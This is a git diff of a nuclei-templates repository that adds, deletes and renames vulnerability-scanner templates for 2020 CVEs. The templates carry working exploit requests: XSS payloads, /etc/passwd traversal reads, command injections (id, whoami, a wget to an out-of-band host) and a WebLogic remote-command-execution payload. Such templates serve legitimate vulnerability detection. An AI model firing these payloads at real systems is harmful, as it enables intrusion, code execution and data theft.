https://gist.github.com/farid007/8db2ab5367ba00e87f9479b32d46fea8 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2020-14413 - cwe-id: CWE-79 - tags: cve,cve2020,nedi,xss - -requests: - - method: GET - path: - - '{{BaseURL}}/Devices-Config.php?sta=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E' - - matchers-condition: and - matchers: - - - type: word - words: - - "" - part: body - - - type: status - status: - - 200 - - - type: word - part: header - words: - - "text/html" \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-14750.yaml b/nuclei-templates/CVE-2020/CVE-2020-14750.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-14750.yaml rename to nuclei-templates/CVE-2020/CVE-2020-14750.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-14864.yaml b/nuclei-templates/CVE-2020/CVE-2020-14864.yaml deleted file mode 100644 index 1a74ce325d..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-14864.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: CVE-2020-14864 -info: - name: Oracle Fusion - "getPreviewImage" Directory Traversal/Local File Inclusion - author: Ivo Palazzolo (@palaziv) - severity: high - description: Oracle Business Intelligence Enterprise Edition 5.5.0.0.0 / 12.2.1.3.0 / 12.2.1.4.0 - "getPreviewImage" Directory Traversal/Local File Inclusion - reference: - - http://packetstormsecurity.com/files/159748/Oracle-Business-Intelligence-Enterprise-Edition-5.5.0.0.0-12.2.1.3.0-12.2.1.4.0-LFI.html - - https://www.oracle.com/security-alerts/cpuoct2020.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2020-14864 - tags: cve,cve2020,oracle,lfi,kev -requests: - - method: GET - path: - - '{{BaseURL}}/analytics/saw.dll?bieehome&startPage=1' # grab autologin cookies - - '{{BaseURL}}/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd' - cookie-reuse: true - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: regex - regex: - - 'root:.*:0:0:' - part: body diff --git a/nuclei-templates/CVE-2020/CVE-2020-14882.yaml b/nuclei-templates/CVE-2020/CVE-2020-14882.yaml new file mode 100644 index 0000000000..77a02b6920 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-14882.yaml @@ -0,0 +1,39 @@ +id: CVE-2020-14882 + +info: + name: Oracle Weblogic Server - Remote Command Execution + author: dwisiswant0 + severity: critical + description: Oracle WebLogic Server contains an easily exploitable remote command execution vulnerability which allows unauthenticated attackers with network access via HTTP to compromise the server. + reference: + - https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf + - https://www.oracle.com/security-alerts/cpuoct2020.html + - https://twitter.com/jas502n/status/1321416053050667009 + - https://youtu.be/JFVDOIL0YtA + - https://github.com/jas502n/CVE-2020-14882#eg + - https://nvd.nist.gov/vuln/detail/CVE-2020-14882 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2020-14882 + tags: cve,cve2020,oracle,rce,weblogic,oast + +requests: + - method: GET + path: + - "{{BaseURL}}/console/images/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://{{interactsh-url}}')" + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "ADMINCONSOLESESSION" + + - type: word + part: interactsh_protocol + words: + - "http" + + +# Enhanced by mp on 2022/04/27 diff --git a/nuclei-templates/CVE-2020/CVE-2020-14883.yaml b/nuclei-templates/CVE-2020/CVE-2020-14883.yaml deleted file mode 100644 index ad615dbf7c..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-14883.yaml +++ /dev/null @@ -1,59 +0,0 @@ -id: CVE-2020-14883 - -info: - name: Oracle Fusion Middleware WebLogic Server Administration Console - Remote Code Execution - author: pdteam - severity: high - description: The Oracle Fusion Middleware WebLogic Server admin console in versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0 is vulnerable to an easily exploitable vulnerability that allows high privileged attackers with network access via HTTP to compromise Oracle WebLogic Server. - reference: - - https://packetstormsecurity.com/files/160143/Oracle-WebLogic-Server-Administration-Console-Handle-Remote-Code-Execution.html - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14883 - - https://www.oracle.com/security-alerts/cpuoct2020.html - - http://packetstormsecurity.com/files/160143/Oracle-WebLogic-Server-Administration-Console-Handle-Remote-Code-Execution.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.2 - cve-id: CVE-2020-14883 - tags: cve,cve2020,oracle,rce,weblogic - -requests: - - raw: - - | - POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1 - Host: {{Hostname}} - Accept-Language: en - CMD: {{cmd}} - Content-Type: application/x-www-form-urlencoded - Accept-Encoding: gzip, deflate - - test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("CMD");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();') - - payloads: - cmd: - - id - - matchers-condition: and - matchers: - - type: word - part: header - words: - - "ADMINCONSOLESESSION" - - - type: word - part: body - words: - - 'uid=' - - 'gid=' - - 'groups=' - condition: and - - - type: status - status: - - 200 - - extractors: - - type: regex - regex: - - "(u|g)id=.*" - -# Enhanced by mp on 2022/04/20 diff --git a/nuclei-templates/CVE-2020/cve-2020-15050.yaml b/nuclei-templates/CVE-2020/CVE-2020-15050.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-15050.yaml rename to nuclei-templates/CVE-2020/CVE-2020-15050.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-15227.yaml b/nuclei-templates/CVE-2020/CVE-2020-15227.yaml new file mode 100644 index 0000000000..2adba03624 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-15227.yaml @@ -0,0 +1,28 @@ +id: CVE-2020-15227 + +info: + name: nette Framework RCE + author: hackergautam + severity: high + reference: unknown + tags: cve,cve2020,nette,rce + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php/nette.micro/?callback=shell_exec&cmd=id&what=-1" + + matchers-condition: and + matchers: + + - type: word + words: + - "uid" + - "gid" + part: body + condition: and + + - type: status + status: + - 200 + diff --git a/nuclei-templates/CVE-2020/CVE-2020-15500.yaml b/nuclei-templates/CVE-2020/CVE-2020-15500.yaml new file mode 100644 index 0000000000..7b0327d35c --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-15500.yaml @@ -0,0 +1,38 @@ +id: CVE-2020-15500 + +info: + name: TileServer GL Reflected XSS + author: Akash.C + severity: medium + description: An issue was discovered in server.js in TileServer GL through 3.0.0. The content of the key GET parameter is reflected unsanitized in an HTTP response for the application's main page, causing reflected XSS. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2020-15500 + - https://github.com/maptiler/tileserver-gl/issues/461 + - http://packetstormsecurity.com/files/162193/Tileserver-gl-3.0.0-Cross-Site-Scripting.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2020-15500 + cwe-id: CWE-79 + tags: cve,cve2020,xss,tileserver + +requests: + - method: GET + path: + - '{{BaseURL}}/?key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss%27%29%3E' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: header + words: + - "text/html" + + - type: word + words: + - "'>\"" + part: body \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-15568.yaml b/nuclei-templates/CVE-2020/CVE-2020-15568.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-15568.yaml rename to nuclei-templates/CVE-2020/CVE-2020-15568.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-15920.yaml b/nuclei-templates/CVE-2020/CVE-2020-15920.yaml deleted file mode 100644 index 24842d818f..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-15920.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2020-15920 - -info: - name: Mida eFramework <=2.9.0 - Remote Command Execution - author: dwisiswant0 - severity: critical - description: Mida eFramework through 2.9.0 allows an attacker to achieve remote code execution with administrative (root) privileges. No authentication is required. - reference: - - https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html - - http://packetstormsecurity.com/files/158991/Mida-eFramework-2.9.0-Remote-Code-Execution.html - - http://packetstormsecurity.com/files/159194/Mida-Solutions-eFramework-ajaxreq.php-Command-Injection.html - - https://nvd.nist.gov/vuln/detail/CVE-2020-15920 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2020-15920 - cwe-id: CWE-78 - tags: cve,cve2020,mida,rce - -requests: - - method: POST - path: - - "{{BaseURL}}/PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING" - - matchers-condition: and - matchers: - - type: regex - part: body - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 -# Enhanced by mp on 2022/05/16 diff --git a/nuclei-templates/CVE-2020/cve-2020-16270.yaml b/nuclei-templates/CVE-2020/CVE-2020-16270.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-16270.yaml rename to nuclei-templates/CVE-2020/CVE-2020-16270.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-16920.yaml b/nuclei-templates/CVE-2020/CVE-2020-16920.yaml new file mode 100644 index 0000000000..c45dc73829 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-16920.yaml @@ -0,0 +1,53 @@ +id: CVE-2019-16920 + +info: + name: Unauthenticated Multiple D-Link Routers RCE + author: dwisiswant0 + severity: critical + description: Unauthenticated remote code execution occurs in D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565. The issue occurs when the attacker sends an arbitrary input to a "PingTest" device common gateway interface that could lead to common injection. An attacker who successfully triggers the command injection could achieve full system compromise. Later, it was independently found that these are also affected; DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825. + reference: https://github.com/pwnhacker0x18/CVE-2019-16920-MassPwn3r + tags: cve,cve2019,dlink,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-16920 + cwe-id: CWE-78 + +requests: + - raw: + - | + POST /apply_sec.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Referer: {{BaseURL}} + + html_response_page=login_pic.asp&login_name=YWRtaW4%3D&log_pass=&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=62384 + - | + POST /apply_sec.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Referer: {{BaseURL}}/login_pic.asp + Cookie: uid=1234123 + + html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('cat /etc/passwd')}} + - | + POST /apply_sec.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Referer: {{BaseURL}}/login_pic.asp + Cookie: uid=1234123 + + html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('type C:\\Windows\\win.ini')}} + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - "\\[(font|extension|file)s\\]" + condition: or + + part: body + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-17362.yaml b/nuclei-templates/CVE-2020/CVE-2020-17362.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-17362.yaml rename to nuclei-templates/CVE-2020/CVE-2020-17362.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-17456.yaml b/nuclei-templates/CVE-2020/CVE-2020-17456.yaml deleted file mode 100644 index 7e4d3b54b3..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-17456.yaml +++ /dev/null @@ -1,53 +0,0 @@ -id: CVE-2020-17456 - -info: - name: SEOWON INTECH SLC-130 & SLR-120S - Unauthenticated Remote Code Execution - author: gy741,edoardottt - severity: critical - description: SEOWON INTECH SLC-130 and SLR-120S devices allow remote code execution via the ipAddr parameter to the system_log.cgi page. - reference: - - https://maj0rmil4d.github.io/Seowon-SlC-130-And-SLR-120S-Exploit/ - - https://nvd.nist.gov/vuln/detail/CVE-2020-17456 - - http://packetstormsecurity.com/files/158933/Seowon-SlC-130-Router-Remote-Code-Execution.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2020-17456 - cwe-id: CWE-78 - tags: rce,seowon,router,unauth,iot,cve,cve2020,oast - -requests: - - raw: - - | - POST /cgi-bin/login.cgi HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - Referer: {{BaseURL}} - Content-Type: application/x-www-form-urlencoded - - browserTime=081119502020¤tTime=1597159205&expires=Wed%252C%2B12%2BAug%2B2020%2B15%253A20%253A05%2BGMT&Command=Submit&user=admin&password=admin - - | - POST /cgi-bin/system_log.cgi HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - Command=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;wget http://{{interactsh-url}}&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018 - - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol - words: - - "http" - - - type: word - part: header - words: - - "text/html" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/04/27 diff --git a/nuclei-templates/CVE-2020/CVE-2020-17505.yaml b/nuclei-templates/CVE-2020/CVE-2020-17505.yaml deleted file mode 100644 index 1d14c7bc10..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-17505.yaml +++ /dev/null @@ -1,43 +0,0 @@ -id: CVE-2020-17505 - -info: - name: Artica Web Proxy 4.30 OS Command Injection - author: dwisiswant0 - severity: high - description: Artica Web Proxy 4.30.000000 allows an authenticated remote attacker to inject commands via the service-cmds parameter in cyrus.php. These commands are executed with root privileges via service_cmds_peform. - reference: - - https://blog.max0x4141.com/post/artica_proxy/ - - http://packetstormsecurity.com/files/159267/Artica-Proxy-4.30.000000-Authentication-Bypass-Command-Injection.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2020-17505 - cwe-id: CWE-78 - tags: cve,cve2020,rce,artica,proxy - -requests: - - raw: - - | - GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1 - Host: {{Hostname}} - Accept: */* - - - | - GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1 - Host: {{Hostname}} - Accept: */* - - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - words: - - "array(2)" - - "Position: ||whoami||" - - "root" - condition: and - - part: body - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2020/CVE-2020-17518.yaml b/nuclei-templates/CVE-2020/CVE-2020-17518.yaml deleted file mode 100644 index 3fb367fddd..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-17518.yaml +++ /dev/null @@ -1,43 +0,0 @@ -id: CVE-2020-17518 - -info: - name: Apache Flink Upload Path Traversal - author: pdteam - severity: high - description: | - Apache Flink 1.5.1 introduced a REST handler that allows you to write an uploaded file to an arbitrary location on the local file system, - through a maliciously modified HTTP HEADER. - reference: - - https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17518 - - https://lists.apache.org/thread.html/rb43cd476419a48be89c1339b527a18116f23eec5b6df2b2acbfef261%40%3Cdev.flink.apache.org%3E - - https://lists.apache.org/thread.html/rb43cd476419a48be89c1339b527a18116f23eec5b6df2b2acbfef261@%3Cuser.flink.apache.org%3E - - https://lists.apache.org/thread.html/rb43cd476419a48be89c1339b527a18116f23eec5b6df2b2acbfef261@%3Cdev.flink.apache.org%3E - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N - cvss-score: 7.5 - cve-id: CVE-2020-17518 - cwe-id: CWE-22 - tags: cve,cve2020,apache,lfi,flink,upload - -requests: - - raw: - - | - POST /jars/upload HTTP/1.1 - Host: {{Hostname}} - Accept: */* - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y - - ------WebKitFormBoundaryoZ8meKnrrso89R6Y - Content-Disposition: form-data; name="jarfile"; filename="../../../../../../../tmp/poc" - - test-poc - ------WebKitFormBoundaryoZ8meKnrrso89R6Y-- - - - method: GET - path: - - '{{BaseURL}}/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc' - - matchers: - - type: dsl - dsl: - - 'contains(body, "test-poc") && status_code == 200' # Using CVE-2020-17519 to confirm this. diff --git a/nuclei-templates/CVE-2020/cve-2020-17519.yaml b/nuclei-templates/CVE-2020/CVE-2020-17519.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-17519.yaml rename to nuclei-templates/CVE-2020/CVE-2020-17519.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-18268.yaml b/nuclei-templates/CVE-2020/CVE-2020-18268.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-18268.yaml rename to nuclei-templates/CVE-2020/CVE-2020-18268.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-19282.yaml b/nuclei-templates/CVE-2020/CVE-2020-19282.yaml deleted file mode 100644 index 92c5d3b641..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-19282.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2020-19282 - -info: - name: Jeesns 1.4.2 XSS - author: pikpikcu - severity: medium - description: Reflected cross-site scripting (XSS) vulnerability in Jeesns 1.4.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the system error message's text field. - reference: - - https://github.com/zchuanzhao/jeesns/issues/11 - - https://nvd.nist.gov/vuln/detail/CVE-2020-19282 - - https://www.seebug.org/vuldb/ssvid-97940 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2020-19282 - cwe-id: CWE-79 - tags: cve,cve2020,jeesns,xss - -requests: - - method: GET - path: - - "{{BaseURL}}/error?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - - type: word - words: - - '' - part: body - - - type: status - status: - - 200 - - - type: word - part: header - words: - - text/html diff --git a/nuclei-templates/CVE-2020/CVE-2020-19283.yaml b/nuclei-templates/CVE-2020/CVE-2020-19283.yaml new file mode 100644 index 0000000000..d04c97fb20 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-19283.yaml @@ -0,0 +1,39 @@ +id: CVE-2020-19283 + +info: + name: Jeesns newVersion Reflection XSS + author: pikpikcu + severity: medium + description: Reflected cross-site scripting (XSS) vulnerability in the /newVersion component of Jeesns 1.4.2 allows attackers to execute arbitrary web scripts or HTML. + reference: + - https://github.com/zchuanzhao/jeesns/issues/10 + - https://nvd.nist.gov/vuln/detail/CVE-2020-19283 + - https://www.seebug.org/vuldb/ssvid-97939 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2020-19283 + cwe-id: CWE-79 + tags: cve,cve2020,jeesns,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/newVersion?callback=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + + - type: word + words: + - "" + part: body + + - type: status + status: + - 200 + + - type: word + part: header + words: + - text/html diff --git a/nuclei-templates/CVE-2020/cve-2020-19360.yaml b/nuclei-templates/CVE-2020/CVE-2020-19360.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-19360.yaml rename to nuclei-templates/CVE-2020/CVE-2020-19360.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-1938.yaml b/nuclei-templates/CVE-2020/CVE-2020-1938.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-1938.yaml rename to nuclei-templates/CVE-2020/CVE-2020-1938.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-1943.yaml b/nuclei-templates/CVE-2020/CVE-2020-1943.yaml new file mode 100644 index 0000000000..8ba36f51aa --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-1943.yaml @@ -0,0 +1,39 @@ +id: CVE-2020-1943 + +info: + name: Apache OFBiz Reflected XSS + author: pdteam + severity: medium + description: Data sent with contentId to /control/stream is not sanitized, allowing XSS attacks in Apache OFBiz 16.11.01 to 16.11.07. + reference: + - https://lists.apache.org/thread.html/rf867d9a25fa656b279b16e27b8ff6fcda689cfa4275a26655c685702%40%3Cdev.ofbiz.apache.org%3E + - https://s.apache.org/pr5u8 + - https://lists.apache.org/thread.html/r034123f2767830169fd04c922afb22d2389de6e2faf3a083207202bc@%3Ccommits.ofbiz.apache.org%3E + - https://lists.apache.org/thread.html/r8efd5b62604d849ae2f93b2eb9ce0ce0356a4cf5812deed14030a757@%3Cdev.ofbiz.apache.org%3E + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2020-1943 + cwe-id: CWE-79 + tags: cve,cve2020,apache,xss,ofbiz + +requests: + - method: GET + path: + - '{{BaseURL}}/control/stream?contentId=%27\%22%3E%3Csvg/onload=alert(xss)%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + words: + - "text/html" + part: header + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2020/CVE-2020-19625.yaml b/nuclei-templates/CVE-2020/CVE-2020-19625.yaml deleted file mode 100644 index eaad72228d..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-19625.yaml +++ /dev/null @@ -1,41 +0,0 @@ -id: CVE-2020-19625 - -info: - name: Gridx 1.3 - Remote Code Execution - author: geeknik - severity: critical - description: | - Gridx 1.3 is susceptible to remote code execution via tests/support/stores/test_grid_filter.php, which allows remote attackers to execute arbitrary code via crafted values submitted to the $query parameter. - reference: - - https://github.com/oria/gridx/issues/433 - - https://nvd.nist.gov/vuln/detail/CVE-2020-19625 - - http://mayoterry.com/file/cve/Remote_Code_Execution_Vulnerability_in_gridx_latest_version.pdf - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2020-19625 - tags: cve,cve2020,gridx,rce - -requests: - - method: GET - path: - - "{{BaseURL}}/tests/support/stores/test_grid_filter.php?query=phpinfo();" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "PHP Extension" - - "PHP Version" - condition: and - extractors: - - type: regex - part: body - group: 1 - regex: - - '

    PHP Version ([0-9.]+)<\/h1>' - -# Enhanced by mp on 2022/04/27 diff --git a/nuclei-templates/CVE-2020/CVE-2020-20988.yaml b/nuclei-templates/CVE-2020/CVE-2020-20988.yaml new file mode 100644 index 0000000000..3068593902 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-20988.yaml @@ -0,0 +1,43 @@ +id: CVE-2020-20988 +info: + name: DomainMOD 4.13.0 - Cross-Site Scripting + author: arafatansari + severity: medium + description: | + DomainMOD 4.13.0 is vulnerable to Cross Site Scripting (XSS) via reporting/domains/cost-by-owner.php in "or Expiring Between" parameter. + reference: + - https://mycvee.blogspot.com/p/xss2.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2020-20988 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: cve,cve2020,domainmod,xss,authenticated +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_username={{username}}&new_password={{password}} + - | + POST /reporting/domains/cost-by-owner.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + daterange=%22%2F%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E + cookie-reuse: true + req-condition: true + redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(all_headers_2, "text/html")' + - 'contains(body_2, "value=\"\"/>")' + - 'contains(body_2, "DomainMOD")' + condition: and diff --git a/nuclei-templates/CVE-2020/CVE-2020-2103.yaml b/nuclei-templates/CVE-2020/CVE-2020-2103.yaml deleted file mode 100644 index 9593563e0e..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-2103.yaml +++ /dev/null @@ -1,58 +0,0 @@ -id: CVE-2020-2103 - -info: - name: Diagnostic page exposed session cookies - author: c-sh0 - severity: medium - description: Jenkins 2.218 and earlier, LTS 2.204.1 and earlier exposed session identifiers on a users detail object in the whoAmI diagnostic page. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2020-2103 - - https://www.jenkins.io/security/advisory/2020-01-29/#SECURITY-1695 - - https://jenkins.io/security/advisory/2020-01-29/#SECURITY-1695 - - http://www.openwall.com/lists/oss-security/2020/01/29/1 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N - cvss-score: 5.4 - cve-id: CVE-2020-2103 - cwe-id: CWE-200 - metadata: - shodan-query: http.favicon.hash:81586312 - tags: cve,cve2020,jenkins - -requests: - - raw: - - | - GET {{BaseURL}}/whoAmI/ HTTP/1.1 - Host: {{Hostname}} - - - | - GET {{BaseURL}}/whoAmI/ HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - req-condition: true - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: header - words: - - 'text/html' - - 'x-jenkins' - condition: and - case-insensitive: true - - - type: word - part: body_2 - words: - - 'Cookie' - - 'SessionId: null' - condition: and - - extractors: - - type: kval - kval: - - x_jenkins \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-21224.yaml b/nuclei-templates/CVE-2020/CVE-2020-21224.yaml new file mode 100644 index 0000000000..9c65602ffd --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-21224.yaml @@ -0,0 +1,42 @@ +id: CVE-2020-21224 + +info: + name: Inspur ClusterEngine 4.0 - Remote Code Execution + author: pikpikcu + severity: critical + description: Inspur ClusterEngine V4.0 is suscptible to a remote code execution vulnerability. A remote attacker can send a malicious login packet to the control server. + reference: + - https://github.com/NS-Sp4ce/Inspur/tree/master/ClusterEngineV4.0%20Vul + - https://nvd.nist.gov/vuln/detail/CVE-2020-21224 + - https://github.com/NS-Sp4ce/Inspur/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2020-21224 + cwe-id: CWE-88 + tags: cve,cve2020,clusterengine,rce + +requests: + - method: POST + path: + - "{{BaseURL}}/login" + headers: + Content-Type: application/x-www-form-urlencoded + Referer: "{{Hostname}}/module/login/login.html" + + body: | + op=login&username=;`cat /etc/passwd`&password= + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + part: body + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/04/28 diff --git a/nuclei-templates/CVE-2020/CVE-2020-2140.yaml b/nuclei-templates/CVE-2020/CVE-2020-2140.yaml deleted file mode 100644 index e124a6fc81..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-2140.yaml +++ /dev/null @@ -1,42 +0,0 @@ -id: CVE-2020-2140 - -info: - name: Jenkin Audit Trail <=3.2 - Cross-Site Scripting - author: j3ssie/geraldino2 - severity: medium - description: Jenkins Audit Trail 3.2 and earlier does not escape the error message for the URL Patterns field form validation, resulting in a 